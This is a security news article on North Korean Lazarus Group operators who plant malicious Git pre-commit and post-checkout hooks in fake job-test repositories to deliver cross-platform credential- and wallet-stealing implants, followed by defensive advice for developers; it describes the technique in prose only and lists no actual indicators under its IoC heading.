North Korean Hackers Weaponize Git Hooks to Deploy Cross-Platform

North Korean hackers have adopted a sophisticated new technique, embedding malware directly within the critical tools software developers use daily. Moving beyond conventional phishing emails and malicious links, these actors are now weaponizing Git hooks. These small, automated scripts, which execute during interactions with a code repository, are being exploited to deploy malicious code, marking a notable shift in targeting development workflows, as detailed

The campaign is a fresh evolution of a long-running operation known as Contagious Interview, linked to North Korea’s Lazarus Group. Attackers pose as fake recruiters on platforms like LinkedIn and reach out to software developers with promises of a legitimate job opportunity.

Victims are handed a coding assessment hosted on a GitHub repository, and once they clone that repo, the trap is already set in motion.

Researchers at OpenSourceMalware identified this technique and found that the malicious script is tucked inside the repository’s .githooks directory, specifically as a pre-commit hook. This means the payload fires the moment a developer tries to commit code — before the commit object is even written.

Most developers never question a repository received as part of a job test, which is exactly what makes this attack so difficult to detect in time.

Git Hooks as a Stealth Delivery Channel

The malware is built to work across multiple operating systems at once. Once triggered, the hook script checks what system the victim is running, then silently contacts a remote server to pull down the right payload.

Windows users receive one version, while macOS and Linux users get another. The goal stays the same across all platforms: steal crypto wallets, harvest sensitive credentials, and establish persistent access to the victim’s machine on behalf of the attacker.

Git hooks are a built-in feature of Git, the version control system used by practically every developer in the world. They are scripts that run automatically at certain points in the development process. In legitimate use, teams deploy them to enforce code quality checks before a commit goes through.

In this attack, the Lazarus Group plants a malicious pre-commit hook inside the repository handed to job candidates. The script is intentionally short and looks completely unremarkable on the surface. When a developer tries to make a change, the hook runs silently in the background, fingerprints the operating system, and contacts a remote server at a domain designed to look tied to legitimate developer infrastructure.

That server delivers a different payload depending on the victim’s system. On macOS and Linux, it serves a shell script. On Windows, it delivers a batch-compatible payload. Both versions install implants capable of stealing credentials, draining crypto wallets, and reporting back to the operators — all while the commit appears to succeed without any issue.

Cross-Platform Malware and Persistence

What makes this campaign stand out is how cleanly it runs across multiple platforms. Most malware is built with one operating system in mind, but this attack delivers a tailored payload to macOS, Linux, and Windows users from a single entry point. That level of flexibility points to an experienced, well-resourced group that invests heavily in keeping its campaigns active.

The implants delivered in this campaign belong to malware families the Lazarus Group has used in earlier operations, including BeaverTail and InvisibleFerret. These tools support keylogging, remote access, browser data theft, and file exfiltration. Researchers have also noted the use of post-checkout hooks, which fire every time a developer switches branches, giving the malware multiple chances to re-execute without any visible user action.

Developers and security teams can take concrete steps to reduce their exposure. Any repository received through a job process or from an unfamiliar source should be treated as hostile until verified. Inspecting the .githooks directory before opening a project, running unknown repositories inside isolated virtual machines with no saved credentials, and adopting organization-wide Git hook inspection policies are all meaningful defenses. Reporting suspicious pre-commit hook patterns to threat intelligence platforms also helps the wider security community respond much faster.

Indicators of Compromise (IoCs):-

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.